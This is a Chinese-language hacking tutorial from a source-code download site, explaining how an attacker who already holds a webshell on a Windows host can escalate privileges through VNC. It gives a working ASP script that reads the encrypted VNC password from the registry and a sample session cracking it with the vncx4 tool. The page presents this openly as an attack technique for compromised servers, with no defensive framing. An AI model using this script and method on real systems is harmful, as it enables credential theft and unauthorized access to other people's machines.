首 页 ┆ 源码下载 ┆ IT学院 ┆ 字体下载 ┆ 模板下载 ┆ 源码发布 ┆ 广告合作 ┆ 网站地图
► 设为首页
► 加入收藏
► 联系我们
源码下载 >> ASP源码 | PHP源码 | ASP.net源码 | JSP源码 | CGI源码 | VC/C++源码 | VB源码 | Delphi源码 | Flash源码
文章学院 >> 网络编程 | 网页设计 | 图形图象 | 数据库 | 服务器 | 网络媒体 | 网络安全 | 操作系统 | 办公软件 | 软件开发 | 黑客知识
字体下载 >> 精制字体 | 非英字体 | 艺术字体 | 著名字体 | 哥特式 | 简单字体 | 手写体 | 节假日 | 图案字体 | 精度像素 | 中文字体
模板下载 >> 企业门户 | 数码网络 | 休闲娱乐 | 影视音乐 | 旅游名胜 | 文化艺术 | 电子商务 | 个性展示 | 登陆导航 | Flash模板
►►您当前的位置:源码园 → IT学院 → 黑客知识 → 黑客进阶 → 文章内容

如何利用VNC服务提升权限--如何利用,VNC,服务,提升,权限

作者:佚名  来源:网上收集  发布时间:2006-11-2 21:53:37
很多时候大家提升权限一般用SERVU,或是找到sa帐户密码等。其实除了这个VNC一般也是以最高权限运行的,而且是图形界面,功能和远程终端类似。

如果得到了一个主机的WEBSHELL,想提升权限,发现主机运行了VNC服务,就可以考虑用下面的方法。

默认情况下VNC服务端的密码是放在注册表中的,本文只针对这种情况。

首先用ASP读出注册表中的加密密码,然后用破解工具破解。

我给出大家一个读取VNC密码的ASP脚本,默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password

Set WshShell = server.CreateObject("WScript.Shell")
bkey=WSHShell.RegRead("HKCU\Software\ORL\WinVNC3\Password")
for each str in bkey
response.write hex(str)
next

读取出来后结果类似 49 40 15 F9 A3 5E 8B 22这种十六进制,这是VNC加密的密码。我们可以用vncx4

破解它,vncx4使用很简单,只要在命令行下输入

c:\>vncx4 -W

然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。

比如我给个测试

H:\tool>vncx4 -W
49
40
15
F9
A3
5E
8B
22
Entered HEX String: 49 40 15 f9 a3 5e 8b 22
VNC Password: 123456
[] [返回上一页] [打 印]
  • 上一篇文章:防范非法用户的入侵--防范,非法用户,入侵
  • 下一篇文章:扭曲变换加密 【目前防止软件被破解最好的方法】--扭曲变换,加密,防止,软件,破解,方法

  • 相关文章:
  • 如何利用JSP连接数据库大全
  • 如何利用JSP的9种基本内置组件
  • 用Delphi编程时如何利用线程
  • [组图]如何利用Word中的“宏”实现快速统计
  • 特洛伊木马如何利用文件关联和设置名
  • 如何利用WIN2000实现两个网段的路由
  • [组图]如何利用Win2000 Server配置路由
  • 如何利用VNC服务提升权限--如何利用,VNC,服务,提升,...
  • 如何利用网页改写注册表--网页,注册表
  • 如何利用VNC服务提升权限--VNC,服务,提升权限,权限
  • 九点提升权限终极技巧--提升,权限,技巧
  • DELPHI如何利用BHO更改网页内容?--DELPHI,利用,BHO,...
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 源码发布
Copyright © 2003-2009 Ymyasp.Com. All Rights Reserved .
备案序号:粤ICP备07029071号